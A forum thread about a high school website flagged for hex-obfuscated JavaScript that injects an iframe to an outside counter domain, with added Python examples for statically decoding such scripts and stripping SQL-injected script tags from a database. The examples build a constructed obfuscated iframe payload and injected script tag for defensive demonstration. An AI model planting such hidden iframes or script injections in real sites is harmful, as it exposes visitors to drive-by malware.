Virus on my high school's website? Or false positive?

Avast is blocking access to http://www.ausd.k12.ca.us/ahs for detecting the JS:Packed-AJ [trj] virus. This is my high school's website. I go there often and never had a problem until today. Can anyone verify if there is a real virus or just a false positive? Is there a way I can download the file and submit it to VirusTotal for scanning? Any help would be appreciated. I need to do my homework, but don't want to get infected with a virus either.

Sophos Anti-Virus doesn't pick anything up, and having a brief look through the source there isn't anything that jumps out at me.

I think it’s safe to say it’s a false positive.

Huge block of obfuscated JS at the bottom of the page: infected.

Shame on Sophos in this one :stuck_out_tongue:
Seems the site was hacked…

suggest avast to your high school :smiley:

I agree ! :smiley:

I've already reported it to Avast. Since they won't get back to me, there's no way to know what they found.

I've also submitted the file to VirusTotal for scanning, and the result is that only Avast, GData, McAfee, and McAfee+Artemis detected something. Is this a new virus that the other engines haven't picked up yet, or a false positive? Is there any way to know for sure? ???

That is sufficient detection to be sure it needs investigating by the school.

It is becoming more common, and many AVs don't monitor the web traffic like Avast does and detect this obfuscated/packed JavaScript.

JavaScript is a plain-language form of scripting, so you can see what it is doing; when people go to lengths to hide what it is doing, that is highly suspicious.

See the image of the code inserted just before the closing body tag. I have broken it up to make it easier to see, as it is on a single line.

You should report this to the school's IT department or webmaster.

The word of the virus analyst before: infected.

Yup! I think it is infected now. I've studied the script on the page and it is a script which generates another script, and that script generates an iframe tag which goes to itcounter.net/counter.php?[random#]

I then searched for itcounter.net but didn't find much info. I'm afraid to go there directly, knowing that a virus may be waiting for me. Is anybody brave enough to check it out?

The fact that the script is very hard to read, plus a script generating another script which generates an iframe tag, is already highly suspicious. Not to mention that all the scripts are encoded with hex characters. Although I cannot 100% confirm whether there is a virus or not, I believe 99% that there is. I'm going to report this to the site owner.
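The post above describes the tell-tale shape of the injected code: a hex-encoded script that writes a second script, which writes an iframe. The following is an added example, not code from this thread or from the school's site, showing how an analyst can triage such a page statically: collect every `<script>` block, measure how much of it is hex escapes, peel the `\xHH` and `%HH` layers as plain text (nothing is evaluated), and pull any iframe target out of the decoded result. The sample page, its two-layer encoding, and the `placeholder.invalid` host are all constructed for the demo.

```python
"""Static triage of a web page for hex-obfuscated, script-generating JavaScript.

Added example, not code from the forum thread. It mimics the pattern the
thread describes: a script that decodes a hex-escaped payload, which writes a
second script, which in turn writes a hidden iframe. The payload is only
unescaped as text; nothing is executed. The iframe target is a placeholder.
"""
import re
from html.parser import HTMLParser

HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')   # JS string escapes: \x3C
PCT_ESCAPE = re.compile(r'%([0-9a-fA-F]{2})')     # unescape()-style: %3C
CODE_RUNNER = re.compile(r'document\.write|eval\s*\(|unescape\s*\(')
IFRAME_SRC = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)


def unescape_layer(s):
    """Decode one layer of escapes: \\xHH first, %HH only if no \\xHH was present."""
    out = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)
    if out != s:
        return out
    return PCT_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def peel(script, max_layers=8):
    """Unescape repeatedly until the text stops changing; return every layer seen."""
    layers = [script]
    for _ in range(max_layers):
        nxt = unescape_layer(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


def hex_density(script):
    """Fraction of characters that are part of \\xHH or %HH escape sequences."""
    if not script:
        return 0.0
    escaped = 4 * len(HEX_ESCAPE.findall(script)) + 3 * len(PCT_ESCAPE.findall(script))
    return escaped / len(script)


class ScriptCollector(HTMLParser):
    """Collect the text of every <script> element in a page."""
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self.in_script = True
            self.scripts.append('')

    def handle_endtag(self, tag):
        if tag == 'script':
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data


def triage(html):
    """Return one finding per <script>: why it looks suspicious and any iframe targets."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for index, script in enumerate(parser.scripts):
        layers = peel(script)
        reasons = []
        if hex_density(script) > 0.3:
            reasons.append('mostly hex-escaped payload')
        if len(layers) > 2:
            reasons.append('%d decoding layers' % (len(layers) - 1))
        if CODE_RUNNER.search(script):
            reasons.append('script writes or evaluates more code')
        targets = IFRAME_SRC.findall(layers[-1])
        if targets:
            reasons.append('decoded payload injects an iframe')
        findings.append({'index': index, 'suspicious': bool(reasons),
                         'reasons': reasons, 'iframe_targets': targets})
    return findings


# --- constructed sample page: INNER is %-encoded into MIDDLE, MIDDLE is \x-encoded into OUTER ---
def _pct(s):
    return ''.join('%%%02X' % ord(c) for c in s)

def _hex(s):
    return ''.join('\\x%02x' % ord(c) for c in s)

INNER = '<iframe src="http://placeholder.invalid/counter.php?1234" width="1" height="1"></iframe>'
MIDDLE = "document.write(unescape('" + _pct(INNER) + "'));"
OUTER = 'eval("' + _hex(MIDDLE) + '");'
SAMPLE_HTML = ('<html><body><h1>Homework page</h1>\n'
               '<script>var counter = 1;</script>\n'
               '<script>' + OUTER + '</script>\n</body></html>')

if __name__ == '__main__':
    for finding in triage(SAMPLE_HTML):
        print(finding)
```

Running it flags only the second script, with the decoded iframe target listed, while the harmless one-line script passes. The density threshold and the keyword list are deliberately crude: they are a triage filter to decide what to hand to the webmaster, not a malware verdict.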

When you go to this much trouble to hide the intent, it is highly suspicious.

See http://www.siteadvisor.com/sites/itcounter.net/postid?p=1431136; somehow I don't think your school gets a counter from a domain registered in Moscow.

So you should certainly report it to the administrator rather than investigate; let them do that. They should have been able to immediately recognise whether that script was placed there by them.

Your site has been hit with a SQL injection attack. It happened to a couple of my sites a while back.

The attack adds script tags, with code to download and execute malicious code, to all text or varchar (over 50 chars) fields in the database.

Look through your database and you should see the code at the end of text strings.

I was able to code an asp script to clean my databases automatically, still have it if you need it - email me for it if you are running MS SQL Server under IIS and I can send it over. andrew at atmwebdesign dot ca

Andrew
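Andrew's post describes the classic mass SQL-injection pattern (a `<script>` tag appended to every text and varchar column) and mentions a cleanup script that is not on the page. The following is an added example, not Andrew's ASP script, showing the same cleanup in Python: walk the catalogue for character-typed columns, find the values that carry a script tag, strip it, and then the parameterised query shape that closes the hole in the first place. It uses an in-memory SQLite database as a stand-in for MS SQL Server, so `sqlite_master`, `PRAGMA table_info` and `rowid` take the place of `INFORMATION_SCHEMA` lookups; the tables, rows, injected tag and `placeholder.invalid` host are constructed for the demo.

```python
"""Find and strip <script> tags that a mass SQL-injection attack appended to
text columns, then show the query shape that closes the hole.

Added example, not Andrew's ASP script from the thread. SQLite stands in for
MS SQL Server; the catalogue queries are the SQLite equivalents of
INFORMATION_SCHEMA lookups. The injected tag and host are constructed.
"""
import re
import sqlite3

# Matches a complete <script ...>...</script> element, across lines.
SCRIPT_TAG = re.compile(r'<script\b[^>]*>.*?</script\s*>', re.I | re.S)
TEXT_TYPES = ('CHAR', 'TEXT', 'CLOB')

INJECTED = '<script src="http://placeholder.invalid/x.js"></script>'  # constructed


def build_sample_db():
    """Constructed database: two tables, one tainted row in each."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE announcements(id INTEGER PRIMARY KEY, title TEXT,
                                   body TEXT, views INTEGER);
        CREATE TABLE staff(id INTEGER PRIMARY KEY, name VARCHAR(80),
                           bio VARCHAR(500));
    """)
    conn.executemany('INSERT INTO announcements VALUES (?, ?, ?, ?)', [
        (1, 'Homework due Friday', 'Chapter 5, problems 1-20' + INJECTED, 10),
        (2, 'Spirit week', 'Wear school colours', 3),
    ])
    conn.executemany('INSERT INTO staff VALUES (?, ?, ?)', [
        (1, 'A. Teacher', 'Teaches maths' + INJECTED),
        (2, 'B. Coach', 'Runs the track team'),
    ])
    conn.commit()
    return conn


def text_columns(conn):
    """Yield (table, column) for every character-typed column in the database."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        # Identifiers come from the catalogue, not from users, and are quoted.
        for _cid, name, ctype, *_rest in conn.execute('PRAGMA table_info("%s")' % table):
            if any(k in (ctype or '').upper() for k in TEXT_TYPES):
                yield table, name


def find_injected(conn):
    """Return (table, column, rowid, value) for every value carrying a script tag."""
    hits = []
    for table, col in text_columns(conn):
        rows = conn.execute(
            'SELECT rowid, "%s" FROM "%s" WHERE "%s" LIKE ?' % (col, table, col),
            ('%<script%',))
        for rowid, value in rows:
            if value and SCRIPT_TAG.search(value):
                hits.append((table, col, rowid, value))
    return hits


def strip_injected(conn):
    """Remove the script tags found by find_injected; return the number of rows fixed."""
    hits = find_injected(conn)
    for table, col, rowid, value in hits:
        conn.execute('UPDATE "%s" SET "%s" = ? WHERE rowid = ?' % (table, col),
                     (SCRIPT_TAG.sub('', value), rowid))
    conn.commit()
    return len(hits)


def lookup_announcement(conn, user_supplied_id):
    """The root-cause fix: bind user input as a parameter, never concatenate it into SQL."""
    row = conn.execute('SELECT title FROM announcements WHERE id = ?',
                       (user_supplied_id,)).fetchone()
    return row[0] if row else None


if __name__ == '__main__':
    db = build_sample_db()
    for hit in find_injected(db):
        print('injected:', hit[:3])
    print('cleaned rows:', strip_injected(db))
    print('still injected:', find_injected(db))
    print(lookup_announcement(db, 1), lookup_announcement(db, '1 OR 1=1'))
```

Cleaning the columns removes the payload but not the cause: as long as the site builds SQL by string concatenation, the next crawl will re-infect it. `lookup_announcement` shows the shape every query should take; with a bound parameter, a value such as `'1 OR 1=1'` is compared as a literal and simply matches nothing.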

Thanks Andrew, but I don't own the site. I've notified the owner and hopefully they'll fix it.